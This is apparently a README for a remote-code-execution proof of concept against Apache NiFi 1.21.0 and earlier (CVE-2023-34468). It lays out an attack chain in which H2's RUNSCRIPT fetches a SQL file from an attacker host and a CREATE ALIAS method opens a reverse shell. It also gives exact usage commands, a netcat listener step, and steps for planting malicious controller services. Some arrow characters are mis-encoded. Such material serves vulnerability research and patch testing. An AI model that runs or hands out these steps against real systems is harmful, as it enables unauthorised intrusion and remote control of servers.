Share
## https://sploitus.com/exploit?id=03188001-D548-5BEF-A035-F0334403C8CE
# CVE-2023-34468 โ Apache NiFi 1.21.0 RCE PoC
Remote Code Execution via H2 Database RUNSCRIPT in Apache NiFi <= 1.21.0
---
## Vulnerability
Apache NiFi ships with an H2 database JAR bundled by default. The `DBCPConnectionPool`
controller service can be configured to use this H2 driver. H2 supports a `RUNSCRIPT`
statement that fetches and executes a SQL file from a remote URL. That SQL file can define
arbitrary Java code via `CREATE ALIAS` and execute it on the server OS.
**Attack chain:**
```
DBCPConnectionPool (H2 driver)
โ ExecuteSQL processor
โ RUNSCRIPT FROM http://attacker/rce.sql
โ CREATE ALIAS (Java method)
โ CALL SHELLEXEC (reverse shell)
```
---
## Affected Versions
| Software | Version |
|-------------|---------------|
| Apache NiFi | <= 1.21.0 |
| Fixed in | 1.21.1+ |
| Java | Any (bundled) |
---
## Requirements
- Python 3.x
- `requests` library โ `pip install requests`
- NiFi target with anonymous write access OR valid credentials
- Network access from target to your machine (for reverse shell callback)
---
## Usage
```bash
python3 poc.py --target http://NiFi.target.com \
--lhost 10.10.10.10 \
--lport 4444 \
--http-port 80 \
--cleanup
```
### Arguments
| Argument | Default | Description |
|--------------|---------------------------|------------------------------------|
| `--target` | http://NiFi.target.com | Target NiFi base URL |
| `--lhost` | 10.10.10.10 | Your IP (tun0) |
| `--lport` | 4444 | Reverse shell listener port |
| `--http-port`| 80 | Port to serve rce.sql |
| `--cleanup` | False | Delete created artifacts after run |
---
## Setup
**Terminal 1 โ listener:**
```bash
nc -lvnp 4444
```
**Terminal 2 โ exploit:**
```bash
python3 poc.py --target http://NiFi.target.com --lhost 10.10.10.10 --lport 4444 --cleanup
```
---
## What the PoC Does
```
Step 1 Check anonymous access and write permissions
Step 2 Get root Process Group ID
Step 3 Create malicious DBCPConnectionPool controller service
Step 4 Enable the controller service (handles revision versioning)
Step 5 Create ExecuteSQL processor pointing to rce.sql on our HTTP server
Step 6 Start the processor โ NiFi fetches rce.sql โ shell callback
Step 7 Cleanup (if --cleanup flag is set)
```